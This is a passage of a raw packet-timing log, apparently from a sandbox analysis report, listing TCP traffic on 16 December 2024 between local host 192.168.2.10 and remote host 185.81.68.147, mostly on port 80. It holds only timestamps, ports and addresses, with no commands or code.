                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.813118935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.813158035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.813225985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.813857079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.813993931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.814084053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.814774036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.814991951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.815067053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.815655947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.815762043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.815960884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.816503048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.816710949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.816787958 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.817488909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.817615986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.817729950 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.818305016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.818408966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.818480968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.819149017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.819231033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.819310904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.820018053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.820231915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.820297956 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.820960045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.821022034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.821088076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.821880102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.821918011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.822000027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.822624922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.822783947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.822946072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.823581934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.823600054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.823652029 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.824687958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.824753046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.824826002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.825378895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.825510979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.825583935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.826170921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.826287985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.826498985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.827104092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.827200890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.827260971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.827897072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.828242064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.828325987 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.828845024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.828970909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.829042912 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.829746008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.829804897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.829878092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.830689907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.830725908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.830797911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.831410885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.831667900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.831731081 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.832416058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.832449913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.832513094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.833169937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.833327055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.833395958 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.834398031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.834435940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.834501028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.835406065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.835519075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.835589886 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.836196899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.836289883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.836363077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.836973906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.837066889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.837137938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.837742090 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.837780952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.837857962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.838449001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.838618994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.838691950 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.839334011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.839848995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.839916945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.840298891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.840337038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.840398073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.841145039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.841180086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.841243982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.841969967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.842006922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.842067003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.842878103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.843142033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.843210936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.843787909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.843822002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.843883038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.844671965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.844707012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.844768047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.845441103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.845592976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.845657110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.846395969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.887173891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.992453098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.992482901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.992556095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.992932081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.992980003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.993026972 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.993881941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.993896008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.993938923 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.994646072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.994729996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.994784117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.995676994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.995687962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.995762110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.996453047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.996903896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.997049093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.997348070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.997359991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.997411966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.998251915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.998262882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.998369932 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.999136925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.999147892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.999203920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.000022888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.000035048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.000088930 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.001110077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.001122952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.001174927 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.001665115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.001832962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.001883030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.002568007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.002728939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.002782106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.003503084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.003559113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.003608942 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.004371881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.004719973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.004776001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.005261898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.005347013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.005553961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.006136894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.006192923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.006277084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.007060051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.007072926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.007123947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.007808924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.007961988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.008173943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.008835077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.008846998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.008904934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.009632111 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.009680033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.009723902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.010478020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.010526896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.010574102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.011334896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.011686087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.011739016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.012214899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.012265921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.012377024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.013088942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.013279915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.013333082 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.014020920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.014031887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.014084101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.014983892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.014997005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.015047073 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.015789986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.015801907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.015882969 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.016805887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.016817093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.016885042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.017612934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.017626047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.017685890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.018481970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.018832922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.018910885 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.019392014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.019427061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.019483089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.020241022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.020277023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.020337105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.021073103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.021107912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.021157026 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.022102118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.022138119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.022202015 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.022808075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.022841930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.022893906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.023753881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.023789883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.023839951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.024523020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.024616957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.024672985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.025382996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.025481939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.025688887 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.026403904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.026441097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.026515961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.027245998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.027281046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.027362108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.028080940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.028156996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.028297901 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.029015064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.029097080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.029196978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.029827118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.029941082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.029999018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.030642986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.030886889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.030949116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.031476021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.031642914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.031697035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.032382011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.032500029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.032649994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.033354998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.033387899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.033451080 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.034229994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.034264088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.034349918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.035057068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.035197020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.035250902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.036024094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.036057949 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.036119938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.036838055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.037448883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.037844896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.037883997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.037939072 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.037969112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.038470984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:01.056258917 CET191249729185.81.68.147192.168.2.10
